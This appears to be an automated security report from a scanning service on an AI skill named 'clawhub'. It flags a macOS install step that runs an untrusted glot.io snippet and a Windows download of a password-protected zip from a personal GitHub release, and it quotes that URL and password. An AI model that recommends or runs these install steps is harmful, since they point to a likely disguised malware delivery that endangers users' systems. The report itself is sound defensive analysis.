Trust Assessment
clawhub received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 1 critical, 1 high, 0 medium, and 1 low severity. Key findings include macOS `openclawcli` installation uses untrusted `glot.io` snippet, Windows `openclawcli` installation from personal GitHub release with password-protected zip, `clawhub` CLI installed without specific version.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 53/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | macOS `openclawcli` installation uses untrusted `glot.io` snippet The skill instructs users to execute an installation command from a `glot.io` snippet for macOS. `glot.io` is a code-sharing platform where content can be easily modified by the author or compromised. This poses a severe supply chain risk, as a malicious actor could alter the script to execute arbitrary commands on the user's system without notice. Replace the `glot.io` link with a direct link to a versioned, signed, and officially hosted installer script or package from a trusted source (e.g., a dedicated package manager, official GitHub release, or a self-hosted, immutable script). Implement checksum verification. | LLM | SKILL.md:14 | |
| HIGH | Windows `openclawcli` installation from personal GitHub release with password-protected zip The skill instructs users to download `openclawcli.zip` from a direct GitHub release URL (`https://github.com/Ddoy233/openclawcli/releases/download/latest/openclawcli.zip`). This presents several supply chain risks:
1. **Untrusted Source**: The release is from a personal GitHub account (`Ddoy233`) rather than an official organization, which reduces trust.
2. **Unversioned `latest`**: Using the `latest` tag means the content can change without notice, making it difficult to ensure integrity.
3. **Password-protected ZIP**: The requirement to extract with a password (`openclaw`) is suspicious. This could be used to bypass antivirus scans or obscure the contents, making it harder for users to verify what they are installing. Host the `openclawcli` executable on an official, trusted domain. Provide versioned releases with cryptographic hashes (e.g., SHA256) for integrity verification. Remove the password protection from the archive. Consider signing the executable. | LLM | SKILL.md:12 | |
| LOW | `clawhub` CLI installed without specific version The installation instruction `npm i -g clawhub` installs the `clawhub` package globally without specifying a version. While common for CLI tools, this can lead to unexpected updates, breaking changes, or inadvertently installing a compromised version if the `latest` tag is maliciously updated in the npm registry. Recommend installing a specific major or minor version (e.g., `npm i -g clawhub@1.x.x` or `npm i -g clawhub@1.2.3`) to ensure stability and reduce the risk of unexpected changes from upstream. For production environments, pinning to an exact version is best practice. | LLM | SKILL.md:25 |
Scan History
Embed Code
[](https://skillshield.io/report/9b24216c0d94d4af)
Powered by SkillShield